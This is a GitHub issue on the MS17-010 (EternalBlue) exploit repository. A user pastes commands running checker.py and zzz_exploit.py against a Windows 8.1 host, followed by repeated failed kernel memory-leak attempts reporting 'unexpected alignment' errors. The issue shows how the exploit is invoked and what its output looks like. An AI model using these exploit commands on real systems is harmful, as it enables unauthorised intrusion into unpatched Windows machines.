search

worawit / MS17-010

MS17-010
2.14k stars 1.1k forks source link

Windows 8.1 Unexpected Alignment Error #12

Open cclements opened 7 years ago

cclements commented 7 years ago

Targeting Windows 8.1 x64 using the guest user account:

python2 checker.py 192.168.10.1
Target OS: Windows 8.1 Connected 9600
The target is not patched

=== Testing named pipes ===
spoolss: Ok (64 bit)
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
python2 zzz_exploit.py 192.168.10.1 spoolss
Target OS: Windows 8.1 Connected 9600
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00208c9a098
InParam: 0xffffc00205e7c16c
MID: 0x1706
unexpected alignment, diff: 0x2e1d098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206410048
InParam: 0xffffc0020627116c
MID: 0x1701
unexpected alignment, diff: 0x19e048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc002064a6098
InParam: 0xffffc0020641d16c
MID: 0x1709
unexpected alignment, diff: 0x88098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc0020649b048
InParam: 0xffffc002064eb16c
MID: 0x170a
unexpected alignment, diff: 0x-50fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206643048
InParam: 0xffffc002065ef16c
MID: 0x1802
unexpected alignment, diff: 0x53048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001ff17f048
InParam: 0xffffc0020664916c
MID: 0x1802
unexpected alignment, diff: 0x-74cafb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206630048
InParam: 0xffffc0020679216c
MID: 0x1802
unexpected alignment, diff: 0x-162fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00205f41048
InParam: 0xffffc002067c416c
MID: 0x190a
unexpected alignment, diff: 0x-883fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fc1f5048
InParam: 0xffffc002068d916c
MID: 0x1902
unexpected alignment, diff: 0x-a6e4fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fe187098
InParam: 0xffffc0020691e16c
MID: 0x190a
unexpected alignment, diff: 0x-8797f68
leak failed... try again
Done